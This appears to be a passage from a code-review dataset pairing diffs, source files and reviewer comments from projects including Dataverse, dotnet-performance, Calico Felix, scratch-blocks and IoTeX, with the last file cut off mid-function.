(IOException e) { logger.log(Level.CONFIG, e.getMessage()); } return rule; } /** * dictionarySubstringRule * <p> * Reads in the getDictionaries from a file. * Substring means that passwords containing a dictionary string fail. * * @return A rule. */ private DictionarySubstringRule dictionarySubstringRule() { DictionarySubstringRule rule = null; try { rule = new DictionarySubstringRule( new WordListDictionary(WordLists.createFromReader( getDictionaries(), false, new ArraysSort()))); } catch (IOException e) { logger.log(Level.CONFIG, e.getMessage()); } return rule; } /** * getDictionaries * * @return A list of readers for each dictionary. */ private FileReader[] getDictionaries() { setDictionaries(systemConfig == null ? 
this.dictionaries : systemConfig.getPVDictionaries()); List<String> files = Arrays.asList(this.dictionaries.split(",")); List<FileReader> fileReaders = new ArrayList<>(files.size()); files.forEach(file -> { try { fileReaders.add(new FileReader(file)); } catch (FileNotFoundException e) { logger.log(Level.CONFIG, e.getMessage()); } }); if (fileReaders.size() == 0) logger.fine(BundleUtil.getStringFromBundle("passwdVal.passwdValBean.warnDictionaryRead")); return fileReaders.toArray(new FileReader[fileReaders.size()]); } void setDictionaries(String dictionaries) { if (dictionaries == null) { final URL url = PasswordValidatorServiceBean.class.getResource(DICTIONARY_FILES); if (url == null) { logger.fine(BundleUtil.getStringFromBundle("passwdVal.passwdValBean.warnDictionaryObj")+" " + DICTIONARY_FILES); dictionaries = DICTIONARY_FILES; } else dictionaries = url.getPath() + File.pathSeparator + url.getFile(); } if (!dictionaries.equals(this.dictionaries)) { this.dictionaries = dictionaries; validators.remove(ValidatorTypes.StandardValidator); } } /** * characterRule * <p> * Sets a this number of characteristics N from M rules. * * @return A CharacterCharacteristicsRule */ private CharacterCharacteristicsRule characterRule(List<CharacterRule> characterRules) { final CharacterCharacteristicsRule characteristicsRule = new CharacterCharacteristicsRule(); characteristicsRule.setNumberOfCharacteristics(getNumberOfCharacteristics()); characteristicsRule.getRules().addAll(characterRules); return characteristicsRule; } private IllegalRegexRule repeatingDigitsRule(int numConsecutiveDigitsAllowed) { int complainAboutThisManyConsecutiveDigits = numConsecutiveDigitsAllowed; if (numConsecutiveDigitsAllowed != Integer.MAX_VALUE) { // The check above is to avoid overflowing the int. MAX_VALUE is how we disable the setting. complainAboutThisManyConsecutiveDigits = numConsecutiveDigitsAllowed + 1; } Pattern pattern = Pattern.compile("\\d{" + complainAboutThisManyConsecutiveDigits + "}"); return new IllegalRegexRule(pattern.pattern()); } /** * parseMessages * * @param messages A list of error messages * @return A Human readable string. */ // TODO: Figure out if we need this. We are probably going will custom messages rather than whatever Passay emits. public static String parseMessages(List<String> messages) { return messages.stream() .map(Object::toString) .collect(Collectors.joining(" \n")); } /** * getGoodPasswordDescription * <p> * Describes all the characteristics of a valid password. */ public String getGoodPasswordDescription(List<String> errors) { boolean dictionaryEnabled = false; String dictionariesSetting = systemConfig.getPVDictionaries(); logger.fine("dictionariesSetting: " + dictionariesSetting); if (dictionariesSetting != null && !dictionariesSetting.isEmpty()) { dictionaryEnabled = true; } logger.fine("dictionaryEnabled: " + dictionaryEnabled); if (errors == null){ errors = new ArrayList<>(); } return PasswordValidatorUtil.getPasswordRequirements(getMinLength(), getMaxLength(), getCharacterRules(), getNumberOfCharacteristics(), getNumberOfConsecutiveDigitsAllowed(), getGoodStrength(), dictionaryEnabled, errors); } /** * getGoodStrength * <p> * Get the length for the GoodStrengthValidator that determines what is a long, hard to brute force password. * * @return A length */ private int getGoodStrength() { int goodStrength = systemConfig == null ? 
this.goodStrength : systemConfig.getPVGoodStrength(); setGoodStrength(goodStrength); return this.goodStrength; } void setGoodStrength(int goodStrength) { if (goodStrength == 0) validators.remove(ValidatorTypes.GoodStrengthValidator); else { int minLength = getMinLength(); if (goodStrength <= minLength) { int reset = minLength + 1; logger.log(Level.WARNING, BundleUtil.getStringFromBundle("passwdVal.passwdValBean.warnSetStrength" , Arrays.asList(Integer.toString(goodStrength),Integer.toString(minLength),Integer.toString(reset)))); goodStrength = reset; } } if (this.goodStrength != goodStrength) { this.goodStrength = goodStrength; validators.remove(ValidatorTypes.GoodStrengthValidator); } } /** * getMaxLength * <p> * The maximum password length for the StandardValidator * * @return A length */ private int getMaxLength() { int maxLength = systemConfig == null ? this.maxLength : systemConfig.getPVMaxLength(); setMaxLength(maxLength); return this.maxLength; } void setMaxLength(int maxLength) { if (this.maxLength != maxLength) { this.maxLength = maxLength; validators.remove(ValidatorTypes.StandardValidator); } } /** * getMinLength * <p> * The minimum password length for the StandardValidator. * * @return A length */ private int getMinLength() { int minLength = systemConfig == null ? this.minLength : systemConfig.getPVMinLength(); setMinLength(minLength); return this.minLength; } void setMinLength(int minLength) { if (this.minLength != minLength) { this.minLength = minLength; validators.remove(ValidatorTypes.StandardValidator); } } public void setCharacterRules(List<CharacterRule> characterRules) { if(!characterRules.equals(this.characterRules)) { this.characterRules = characterRules; validators.remove(ValidatorTypes.StandardValidator); } } public List<CharacterRule> getCharacterRules() { List<CharacterRule> characterRules = systemConfig == null ? this.characterRules : systemConfig.getPVCharacterRules(); setCharacterRules(characterRules); return this.characterRules; } void setNumberOfCharacteristics(int numberOfCharacteristics) { if (this.numberOfCharacteristics != numberOfCharacteristics) { this.numberOfCharacteristics = numberOfCharacteristics; validators.remove(ValidatorTypes.StandardValidator); } } public int getNumberOfCharacteristics() { int numberOfCharacteristics = systemConfig == null ? this.numberOfCharacteristics : systemConfig.getPVNumberOfCharacteristics(); setNumberOfCharacteristics(numberOfCharacteristics); return this.numberOfCharacteristics; } public int getNumberOfConsecutiveDigitsAllowed() { int numConsecutiveDigitsAllowed = systemConfig == null ? this.numberOfConsecutiveDigitsAllowed : systemConfig.getPVNumberOfConsecutiveDigitsAllowed(); setNumberOfConsecutiveDigitsAllowed(numConsecutiveDigitsAllowed); return this.numberOfConsecutiveDigitsAllowed; } public void setNumberOfConsecutiveDigitsAllowed(int numberOfConsecutiveDigitsAllowed) { this.numberOfConsecutiveDigitsAllowed = numberOfConsecutiveDigitsAllowed; } }
1
45,048
passwordModificationTime is no longer used - did the change drop a time check that should be restored? Or should the param get dropped from the methods?
IQSS-dataverse
java
@@ -40,7 +40,7 @@ namespace ScenarioMeasurement source.Kernel.ProcessStart += evt => { - if (processName.Equals(evt.ProcessName, StringComparison.OrdinalIgnoreCase) && pids.Contains(evt.ProcessID) && evt.CommandLine == commandLine) + if (processName.Equals(evt.ProcessName, StringComparison.OrdinalIgnoreCase) && pids.Contains(evt.ProcessID) && evt.CommandLine.Trim() == commandLine.Trim()) { if (pid.HasValue) {
1
using Microsoft.Diagnostics.Tracing; using Microsoft.Diagnostics.Tracing.Parsers; using Microsoft.Diagnostics.Tracing.Session; using Reporting; using System; using System.Collections.Generic; using System.Linq; namespace ScenarioMeasurement { // [EventSource(Guid = "9bb228bd-1033-5cf0-1a56-c2dbbe0ebc86")] // class PerfLabGenericEventSource : EventSource // { // public static PerfLabGenericEventSource Log = new PerfLabGenericEventSource(); // public void Startup() => WriteEvent(1); // } internal class GenericStartupParser : IParser { public void EnableKernelProvider(TraceEventSession kernel) { kernel.EnableKernelProvider((KernelTraceEventParser.Keywords)(KernelTraceEventParser.Keywords.Process | KernelTraceEventParser.Keywords.Thread | KernelTraceEventParser.Keywords.ContextSwitch)); } public void EnableUserProviders(TraceEventSession user) { user.EnableProvider("PerfLabGenericEventSource"); } public IEnumerable<Counter> Parse(string mergeTraceFile, string processName, IList<int> pids, string commandLine) { var results = new List<double>(); var threadTimes = new List<double>(); double threadTime = 0; var ins = new Dictionary<int, double>(); double start = -1; int? pid = null; using (var source = new ETWTraceEventSource(mergeTraceFile)) { source.Kernel.ProcessStart += evt => { if (processName.Equals(evt.ProcessName, StringComparison.OrdinalIgnoreCase) && pids.Contains(evt.ProcessID) && evt.CommandLine == commandLine) { if (pid.HasValue) { // Processes might be reentrant. For now this traces the first (outermost) process of a given name. return; } pid = evt.ProcessID; start = evt.TimeStampRelativeMSec; } }; source.Kernel.ThreadCSwitch += evt => { if (!pid.HasValue) // we're currently in a measurement interval return; if (evt.NewProcessID != pid && evt.OldProcessID != pid) return; // but this isn't our process if (evt.OldProcessID == pid) // this is a switch out from our process { if (ins.TryGetValue(evt.OldThreadID, out var value)) // had we ever recorded a switch in for this thread? { threadTime += evt.TimeStampRelativeMSec - value; ins.Remove(evt.OldThreadID); } } else // this is a switch in to our process { ins[evt.NewThreadID] = evt.TimeStampRelativeMSec; } }; source.Dynamic.AddCallbackForProviderEvent("PerfLabGenericEventSource", "Startup", evt => { if (pid.HasValue && evt.ProcessID == pid && evt.ProcessName.Equals(processName, StringComparison.OrdinalIgnoreCase)) { results.Add(evt.TimeStampRelativeMSec - start); threadTimes.Add(threadTime); pid = null; threadTime = 0; start = 0; } }); source.Process(); } return new[] { new Counter() { Name = "Generic Startup", MetricName = "ms", Results = results.ToArray() }, new Counter() { Name = "Time on Thread", MetricName = "ms", Results = threadTimes.ToArray() } }; } } }
1
10,466
Would it break here without trim? If so, can we do trim in Startup.cs so we don't need to add this code to every parser?
dotnet-performance
.cs
@@ -115,7 +115,7 @@ var _ = Describe("with running container", func() { It("iptables should succeed in getting the lock after 3s", func() { iptCmd := cmdInContainer("iptables", "-w", "3", "-A", "FORWARD") out, err := iptCmd.CombinedOutput() - Expect(string(out)).To(ContainSubstring("Another app is currently holding the xtables lock")) + log.Printf("iptables output='%s'", out) Expect(err).NotTo(HaveOccurred()) })
1
// +build fvtests // Copyright (c) 2017 Tigera, Inc. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package fv_test import ( "bufio" "fmt" "os" "os/exec" "strings" "time" log "github.com/Sirupsen/logrus" . "github.com/onsi/ginkgo" . "github.com/onsi/gomega" ) var _ = Describe("with running container", func() { var containerIdx int var containerName string var felixCmd *exec.Cmd cmdInContainer := func(cmd ...string) *exec.Cmd { arg := []string{"exec", containerName} arg = append(arg, cmd...) return exec.Command("docker", arg...) } BeforeEach(func() { containerName = fmt.Sprintf("felix-fv-%d-%d", os.Getpid(), containerIdx) containerIdx++ myDir, err := os.Getwd() Expect(err).NotTo(HaveOccurred()) log.WithFields(log.Fields{ "name": containerName, "myDir": myDir, }).Info("Starting a Felix container") // Run a felix container. The tests in this file don't actually rely on Felix // but the calico/felix container has all the iptables dependencies we need to // check the lock behaviour. Note: we don't map the host's iptables lock into the // container so the scope of the lock is limited to the container. felixCmd = exec.Command("docker", "run", "--rm", "--name", containerName, "-v", fmt.Sprintf("%s/..:/codebase", myDir), "--privileged", "calico/felix") err = felixCmd.Start() Expect(err).NotTo(HaveOccurred()) log.Info("Waiting for container to be listed in docker ps") start := time.Now() for { cmd := exec.Command("docker", "ps") out, err := cmd.CombinedOutput() Expect(err).NotTo(HaveOccurred()) if strings.Contains(string(out), containerName) { break } if time.Since(start) > 10*time.Second { log.Panic("Timed out waiting for container to be listed.") } } }) AfterEach(func() { // Send an interrupt to ensure that docker gracefully shuts down the container. // If we kill the docker process then it detaches the container. log.Info("Stopping Felix container") felixCmd.Process.Signal(os.Interrupt) }) Describe("with the lock being held for 2s", func() { var lockCmd *exec.Cmd BeforeEach(func() { // Start the iptables-locker, which is a simple test app that locks // the iptables lock and then releases it after a timeout. log.Info("Starting iptables-locker") lockCmd = cmdInContainer("/codebase/bin/iptables-locker", "2s") stdErr, err := lockCmd.StderrPipe() Expect(err).NotTo(HaveOccurred()) lockCmd.Start() // Wait for the iptables-locker to tell us that it actually acquired the // lock. 
log.Info("Waiting for iptables-locker to acquire lock") scanner := bufio.NewScanner(stdErr) Expect(scanner.Scan()).To(BeTrue()) Expect(scanner.Text()).To(Equal("LOCKED")) Expect(scanner.Err()).NotTo(HaveOccurred()) log.Info("iptables-locker acquired lock") }) It("iptables should fail to get the lock in 1s", func() { iptCmd := cmdInContainer("iptables", "-w", "1", "-A", "FORWARD") out, err := iptCmd.CombinedOutput() Expect(string(out)).To(ContainSubstring("Stopped waiting")) Expect(err).To(HaveOccurred()) }) It("iptables should succeed in getting the lock after 3s", func() { iptCmd := cmdInContainer("iptables", "-w", "3", "-A", "FORWARD") out, err := iptCmd.CombinedOutput() Expect(string(out)).To(ContainSubstring("Another app is currently holding the xtables lock")) Expect(err).NotTo(HaveOccurred()) }) AfterEach(func() { if lockCmd != nil { log.Info("waiting for iptables-locker to finish") err := lockCmd.Wait() Expect(err).NotTo(HaveOccurred()) } }) }) })
1
15,555
Since we're using Logrus, probably best to use `Infof` to avoid confusion (Logrus' Printf behaves differently to the built in one)
projectcalico-felix
go
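To make the reviewer's suggestion above concrete, here is a small sketch assuming the same `log "github.com/Sirupsen/logrus"` alias the test file uses; the output value is just a placeholder.

package main

import (
	log "github.com/Sirupsen/logrus"
)

func main() {
	out := []byte("Another app is currently holding the xtables lock\n")

	// With the logrus alias, log.Printf resolves to logrus's Printf rather than the standard
	// library's, and the two behave differently; Infof states the intent (info level, formatted)
	// explicitly and avoids that confusion.
	log.Infof("iptables output='%s'", out)
}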
@@ -155,13 +155,14 @@ Blockly.FlyoutButton.prototype.createDom = function() { this.svgGroup_); svgText.textContent = this.text_; - this.width = svgText.getComputedTextLength() + - 2 * Blockly.FlyoutButton.MARGIN; + this.width = svgText.getComputedTextLength(); if (!this.isLabel_) { + this.width += 2 * Blockly.FlyoutButton.MARGIN; shadow.setAttribute('width', this.width); shadow.setAttribute('height', this.height); } + rect.setAttribute('width', this.width); rect.setAttribute('height', this.height);
1
/** * @license * Visual Blocks Editor * * Copyright 2016 Google Inc. * https://developers.google.com/blockly/ * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /** * @fileoverview Class for a button in the flyout. * @author [email protected] (Rachel Fenichel) */ 'use strict'; goog.provide('Blockly.FlyoutButton'); goog.require('goog.dom'); goog.require('goog.math.Coordinate'); /** * Class for a button in the flyout. * @param {!Blockly.WorkspaceSvg} workspace The workspace in which to place this * button. * @param {!Blockly.WorkspaceSvg} targetWorkspace The flyout's target workspace. * @param {!Element} xml The XML specifying the label/button. * @param {boolean} isLabel Whether this button should be styled as a label. * @constructor */ Blockly.FlyoutButton = function(workspace, targetWorkspace, xml, isLabel) { // Labels behave the same as buttons, but are styled differently. /** * @type {!Blockly.WorkspaceSvg} * @private */ this.workspace_ = workspace; /** * @type {!Blockly.Workspace} * @private */ this.targetWorkspace_ = targetWorkspace; /** * @type {string} * @private */ this.text_ = xml.getAttribute('text'); /** * @type {!goog.math.Coordinate} * @private */ this.position_ = new goog.math.Coordinate(0, 0); /** * Whether this button should be styled as a label. * @type {boolean} * @private */ this.isLabel_ = isLabel; /** * Function to call when this button is clicked. * @type {function(!Blockly.FlyoutButton)} * @private */ this.callback_ = null; var callbackKey = xml.getAttribute('callbackKey'); if (this.isLabel_ && callbackKey) { console.warn('Labels should not have callbacks. Label text: ' + this.text_); } else if (!this.isLabel_ && !(callbackKey && targetWorkspace.getButtonCallback(callbackKey))) { console.warn('Buttons should have callbacks. Button text: ' + this.text_); } else { this.callback_ = targetWorkspace.getButtonCallback(callbackKey); } /** * If specified, a CSS class to add to this button. * @type {?string} * @private */ this.cssClass_ = xml.getAttribute('web-class') || null; }; /** * The margin around the text in the button. */ Blockly.FlyoutButton.MARGIN = 40; /** * The width of the button's rect. * @type {number} */ Blockly.FlyoutButton.prototype.width = 0; /** * The height of the button's rect. * @type {number} */ Blockly.FlyoutButton.prototype.height = 40; // Can't be computed like the width /** * Opaque data that can be passed to Blockly.unbindEvent_. * @type {Array.<!Array>} * @private */ Blockly.FlyoutButton.prototype.onMouseUpWrapper_ = null; /** * Create the button elements. * @return {!Element} The button's SVG group. */ Blockly.FlyoutButton.prototype.createDom = function() { var cssClass = this.isLabel_ ? 'blocklyFlyoutLabel' : 'blocklyFlyoutButton'; if (this.cssClass_) { cssClass += ' ' + this.cssClass_; } this.svgGroup_ = Blockly.utils.createSvgElement('g', {'class': cssClass}, this.workspace_.getCanvas()); if (!this.isLabel_) { // Shadow rectangle (light source does not mirror in RTL). 
var shadow = Blockly.utils.createSvgElement('rect', {'class': 'blocklyFlyoutButtonShadow', 'rx': 4, 'ry': 4, 'x': 1, 'y': 1}, this.svgGroup_); } // Background rectangle. var rect = Blockly.utils.createSvgElement('rect', {'class': this.isLabel_ ? 'blocklyFlyoutLabelBackground' : 'blocklyFlyoutButtonBackground', 'rx': 4, 'ry': 4}, this.svgGroup_); var svgText = Blockly.utils.createSvgElement('text', {'class': this.isLabel_ ? 'blocklyFlyoutLabelText' : 'blocklyText', 'x': 0, 'y': 0, 'text-anchor': 'middle'}, this.svgGroup_); svgText.textContent = this.text_; this.width = svgText.getComputedTextLength() + 2 * Blockly.FlyoutButton.MARGIN; if (!this.isLabel_) { shadow.setAttribute('width', this.width); shadow.setAttribute('height', this.height); } rect.setAttribute('width', this.width); rect.setAttribute('height', this.height); svgText.setAttribute('text-anchor', 'middle'); svgText.setAttribute('alignment-baseline', 'central'); svgText.setAttribute('x', this.width / 2); svgText.setAttribute('y', this.height / 2); this.updateTransform_(); this.mouseUpWrapper_ = Blockly.bindEventWithChecks_(this.svgGroup_, 'mouseup', this, this.onMouseUp_); return this.svgGroup_; }; /** * Correctly position the flyout button and make it visible. */ Blockly.FlyoutButton.prototype.show = function() { this.updateTransform_(); this.svgGroup_.setAttribute('display', 'block'); }; /** * Update svg attributes to match internal state. * @private */ Blockly.FlyoutButton.prototype.updateTransform_ = function() { this.svgGroup_.setAttribute('transform', 'translate(' + this.position_.x + ',' + this.position_.y + ')'); }; /** * Move the button to the given x, y coordinates. * @param {number} x The new x coordinate. * @param {number} y The new y coordinate. */ Blockly.FlyoutButton.prototype.moveTo = function(x, y) { this.position_.x = x; this.position_.y = y; this.updateTransform_(); }; /** * Get the button's target workspace. * @return {!Blockly.WorkspaceSvg} The target workspace of the flyout where this * button resides. */ Blockly.FlyoutButton.prototype.getTargetWorkspace = function() { return this.targetWorkspace_; }; /** * Dispose of this button. */ Blockly.FlyoutButton.prototype.dispose = function() { if (this.onMouseUpWrapper_) { Blockly.unbindEvent_(this.onMouseUpWrapper_); } if (this.svgGroup_) { goog.dom.removeNode(this.svgGroup_); this.svgGroup_ = null; } this.workspace_ = null; this.targetWorkspace_ = null; }; /** * Do something when the button is clicked. * @param {!Event} e Mouse up event. * @private */ Blockly.FlyoutButton.prototype.onMouseUp_ = function(e) { var gesture = this.targetWorkspace_.getGesture(e); if (gesture) { gesture.cancel(); } // Call the callback registered to this button. if (this.callback_) { this.callback_(this); } };
1
8,646
Hm, this looks like a change that should go upstream as well.
LLK-scratch-blocks
js
@@ -1533,16 +1533,6 @@ func (core *coreService) ChainID() uint32 { return core.bc.ChainID() } -// GetActionByActionHash returns action by action hash -func (core *coreService) ActionByActionHash(h hash.Hash256) (action.SealedEnvelope, error) { - if !core.hasActionIndex || core.indexer == nil { - return action.SealedEnvelope{}, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) - } - - selp, _, _, _, err := core.getActionByActionHash(h) - return selp, err -} - // ReadContractStorage reads contract's storage func (core *coreService) ReadContractStorage(ctx context.Context, addr address.Address, key []byte) ([]byte, error) { ctx, err := core.bc.Context(ctx)
1
// Copyright (c) 2019 IoTeX Foundation // This is an alpha (internal) release and is not suitable for production. This source code is provided 'as is' and no // warranties are given as to title or non-infringement, merchantability or fitness for purpose and, to the extent // permitted by law, all liability for your use of the code is disclaimed. This source code is governed by Apache // License 2.0 that can be found in the LICENSE file. package api import ( "bytes" "context" "encoding/hex" "fmt" "math" "math/big" "strconv" "time" "github.com/golang/protobuf/ptypes" "github.com/pkg/errors" "go.uber.org/zap" "google.golang.org/genproto/googleapis/rpc/errdetails" "google.golang.org/grpc/codes" "google.golang.org/grpc/status" "google.golang.org/protobuf/proto" "github.com/iotexproject/go-pkgs/hash" "github.com/iotexproject/iotex-address/address" "github.com/iotexproject/iotex-election/committee" "github.com/iotexproject/iotex-proto/golang/iotexapi" "github.com/iotexproject/iotex-proto/golang/iotextypes" "github.com/iotexproject/iotex-core/action" "github.com/iotexproject/iotex-core/action/protocol" accountutil "github.com/iotexproject/iotex-core/action/protocol/account/util" "github.com/iotexproject/iotex-core/action/protocol/execution/evm" "github.com/iotexproject/iotex-core/action/protocol/poll" "github.com/iotexproject/iotex-core/action/protocol/rolldpos" "github.com/iotexproject/iotex-core/actpool" logfilter "github.com/iotexproject/iotex-core/api/logfilter" "github.com/iotexproject/iotex-core/blockchain" "github.com/iotexproject/iotex-core/blockchain/block" "github.com/iotexproject/iotex-core/blockchain/blockdao" "github.com/iotexproject/iotex-core/blockchain/filedao" "github.com/iotexproject/iotex-core/blockchain/genesis" "github.com/iotexproject/iotex-core/blockindex" "github.com/iotexproject/iotex-core/blocksync" "github.com/iotexproject/iotex-core/config" "github.com/iotexproject/iotex-core/db" "github.com/iotexproject/iotex-core/gasstation" "github.com/iotexproject/iotex-core/pkg/log" "github.com/iotexproject/iotex-core/pkg/tracer" "github.com/iotexproject/iotex-core/pkg/version" "github.com/iotexproject/iotex-core/state" "github.com/iotexproject/iotex-core/state/factory" ) // coreService provides api for user to interact with blockchain data type coreService struct { bc blockchain.Blockchain bs blocksync.BlockSync sf factory.Factory dao blockdao.BlockDAO indexer blockindex.Indexer bfIndexer blockindex.BloomFilterIndexer ap actpool.ActPool gs *gasstation.GasStation broadcastHandler BroadcastOutbound cfg config.Config registry *protocol.Registry chainListener Listener hasActionIndex bool electionCommittee committee.Committee readCache *ReadCache } // newcoreService creates a api server that contains major blockchain components func newCoreService( cfg config.Config, chain blockchain.Blockchain, bs blocksync.BlockSync, sf factory.Factory, dao blockdao.BlockDAO, indexer blockindex.Indexer, bfIndexer blockindex.BloomFilterIndexer, actPool actpool.ActPool, registry *protocol.Registry, opts ...Option, ) (*coreService, error) { apiCfg := Config{} for _, opt := range opts { if err := opt(&apiCfg); err != nil { return nil, err } } if cfg.API == (config.API{}) { log.L().Warn("API server is not configured.") cfg.API = config.Default.API } if cfg.API.RangeQueryLimit < uint64(cfg.API.TpsWindow) { return nil, errors.New("range query upper limit cannot be less than tps window") } svr := &coreService{ bc: chain, bs: bs, sf: sf, dao: dao, indexer: indexer, bfIndexer: bfIndexer, ap: actPool, 
broadcastHandler: apiCfg.broadcastHandler, cfg: cfg, registry: registry, chainListener: NewChainListener(500), gs: gasstation.NewGasStation(chain, sf.SimulateExecution, dao, cfg.API), electionCommittee: apiCfg.electionCommittee, readCache: NewReadCache(), } if _, ok := cfg.Plugins[config.GatewayPlugin]; ok { svr.hasActionIndex = true } return svr, nil } // Account returns the metadata of an account func (core *coreService) Account(addr address.Address) (*iotextypes.AccountMeta, *iotextypes.BlockIdentifier, error) { addrStr := addr.String() if addrStr == address.RewardingPoolAddr || addrStr == address.StakingBucketPoolAddr { return core.getProtocolAccount(context.Background(), addrStr) } state, tipHeight, err := accountutil.AccountStateWithHeight(core.sf, addr) if err != nil { return nil, nil, status.Error(codes.NotFound, err.Error()) } pendingNonce, err := core.ap.GetPendingNonce(addrStr) if err != nil { return nil, nil, status.Error(codes.Internal, err.Error()) } if core.indexer == nil { return nil, nil, status.Error(codes.NotFound, blockindex.ErrActionIndexNA.Error()) } numActions, err := core.indexer.GetActionCountByAddress(hash.BytesToHash160(addr.Bytes())) if err != nil { return nil, nil, status.Error(codes.NotFound, err.Error()) } accountMeta := &iotextypes.AccountMeta{ Address: addrStr, Balance: state.Balance.String(), Nonce: state.Nonce, PendingNonce: pendingNonce, NumActions: numActions, IsContract: state.IsContract(), } if state.IsContract() { var code evm.SerializableBytes _, err = core.sf.State(&code, protocol.NamespaceOption(evm.CodeKVNameSpace), protocol.KeyOption(state.CodeHash)) if err != nil { return nil, nil, status.Error(codes.NotFound, err.Error()) } accountMeta.ContractByteCode = code } header, err := core.bc.BlockHeaderByHeight(tipHeight) if err != nil { return nil, nil, status.Error(codes.NotFound, err.Error()) } hash := header.HashBlock() return accountMeta, &iotextypes.BlockIdentifier{ Hash: hex.EncodeToString(hash[:]), Height: tipHeight, }, nil } // ChainMeta returns blockchain metadata func (core *coreService) ChainMeta() (*iotextypes.ChainMeta, string, error) { tipHeight := core.bc.TipHeight() if tipHeight == 0 { return &iotextypes.ChainMeta{ Epoch: &iotextypes.EpochData{}, ChainID: core.bc.ChainID(), }, "", nil } syncStatus := "" if core.bs != nil { syncStatus = core.bs.SyncStatus() } chainMeta := &iotextypes.ChainMeta{ Height: tipHeight, ChainID: core.bc.ChainID(), } if core.indexer == nil { return chainMeta, syncStatus, nil } totalActions, err := core.indexer.GetTotalActions() if err != nil { return nil, "", status.Error(codes.Internal, err.Error()) } blockLimit := int64(core.cfg.API.TpsWindow) if blockLimit <= 0 { return nil, "", status.Errorf(codes.Internal, "block limit is %d", blockLimit) } // avoid genesis block if int64(tipHeight) < blockLimit { blockLimit = int64(tipHeight) } blks, err := core.BlockMetas(tipHeight-uint64(blockLimit)+1, uint64(blockLimit)) if err != nil { return nil, "", status.Error(codes.NotFound, err.Error()) } if len(blks) == 0 { return nil, "", status.Error(codes.NotFound, "get 0 blocks! 
not able to calculate aps") } var numActions int64 for _, blk := range blks { numActions += blk.NumActions } t1 := time.Unix(blks[0].Timestamp.GetSeconds(), int64(blks[0].Timestamp.GetNanos())) t2 := time.Unix(blks[len(blks)-1].Timestamp.GetSeconds(), int64(blks[len(blks)-1].Timestamp.GetNanos())) // duration of time difference in milli-seconds // TODO: use config.Genesis.BlockInterval after PR1289 merges timeDiff := (t2.Sub(t1) + 10*time.Second) / time.Millisecond tps := float32(numActions*1000) / float32(timeDiff) chainMeta.NumActions = int64(totalActions) chainMeta.Tps = int64(math.Ceil(float64(tps))) chainMeta.TpsFloat = tps rp := rolldpos.FindProtocol(core.registry) if rp != nil { epochNum := rp.GetEpochNum(tipHeight) epochHeight := rp.GetEpochHeight(epochNum) gravityChainStartHeight, err := core.getGravityChainStartHeight(epochHeight) if err != nil { return nil, "", status.Error(codes.NotFound, err.Error()) } chainMeta.Epoch = &iotextypes.EpochData{ Num: epochNum, Height: epochHeight, GravityChainStartHeight: gravityChainStartHeight, } } return chainMeta, syncStatus, nil } // ServerMeta gets the server metadata func (core *coreService) ServerMeta() (packageVersion string, packageCommitID string, gitStatus string, goVersion string, buildTime string) { packageVersion = version.PackageVersion packageCommitID = version.PackageCommitID gitStatus = version.GitStatus goVersion = version.GoVersion buildTime = version.BuildTime return } // SendAction is the API to send an action to blockchain. func (core *coreService) SendAction(ctx context.Context, in *iotextypes.Action) (string, error) { log.L().Debug("receive send action request") var selp action.SealedEnvelope if err := selp.LoadProto(in); err != nil { return "", status.Error(codes.InvalidArgument, err.Error()) } // reject action if chainID is not matched at KamchatkaHeight if core.cfg.Genesis.Blockchain.IsToBeEnabled(core.bc.TipHeight()) { if core.bc.ChainID() != in.GetCore().GetChainID() { return "", status.Errorf(codes.InvalidArgument, "ChainID does not match, expecting %d, got %d", core.bc.ChainID(), in.GetCore().GetChainID()) } } // Add to local actpool ctx = protocol.WithRegistry(ctx, core.registry) hash, err := selp.Hash() if err != nil { return "", err } l := log.L().With(zap.String("actionHash", hex.EncodeToString(hash[:]))) if err = core.ap.Add(ctx, selp); err != nil { txBytes, serErr := proto.Marshal(in) if serErr != nil { l.Error("Data corruption", zap.Error(serErr)) } else { l.With(zap.String("txBytes", hex.EncodeToString(txBytes))).Error("Failed to accept action", zap.Error(err)) } errMsg := core.cfg.ProducerAddress().String() + ": " + err.Error() st := status.New(codes.Internal, errMsg) br := &errdetails.BadRequest{ FieldViolations: []*errdetails.BadRequest_FieldViolation{ { Field: "Action rejected", Description: action.LoadErrorDescription(err), }, }, } st, err := st.WithDetails(br) if err != nil { log.S().Panicf("Unexpected error attaching metadata: %v", err) } return "", st.Err() } // If there is no error putting into local actpool, // Broadcast it to the network if err = core.broadcastHandler(ctx, core.bc.ChainID(), in); err != nil { l.Warn("Failed to broadcast SendAction request.", zap.Error(err)) } return hex.EncodeToString(hash[:]), nil } // ReceiptByAction gets receipt with corresponding action hash func (core *coreService) ReceiptByAction(actHash hash.Hash256) (*action.Receipt, string, error) { if !core.hasActionIndex || core.indexer == nil { return nil, "", status.Error(codes.NotFound, 
blockindex.ErrActionIndexNA.Error()) } receipt, err := core.ReceiptByActionHash(actHash) if err != nil { return nil, "", status.Error(codes.NotFound, err.Error()) } blkHash, err := core.getBlockHashByActionHash(actHash) if err != nil { return nil, "", status.Error(codes.NotFound, err.Error()) } return receipt, hex.EncodeToString(blkHash[:]), nil } // ReadContract reads the state in a contract address specified by the slot func (core *coreService) ReadContract(ctx context.Context, in *iotextypes.Execution, callerAddr address.Address, gasLimit uint64) (string, *iotextypes.Receipt, error) { log.L().Debug("receive read smart contract request") sc := &action.Execution{} if err := sc.LoadProto(in); err != nil { return "", nil, status.Error(codes.InvalidArgument, err.Error()) } key := hash.Hash160b(append([]byte(sc.Contract()), sc.Data()...)) // TODO: either moving readcache into the upper layer or change the storage format if d, ok := core.readCache.Get(key); ok { res := iotexapi.ReadContractResponse{} if err := proto.Unmarshal(d, &res); err == nil { return res.Data, res.Receipt, nil } } state, err := accountutil.AccountState(core.sf, callerAddr) if err != nil { return "", nil, status.Error(codes.InvalidArgument, err.Error()) } if ctx, err = core.bc.Context(ctx); err != nil { return "", nil, err } if gasLimit 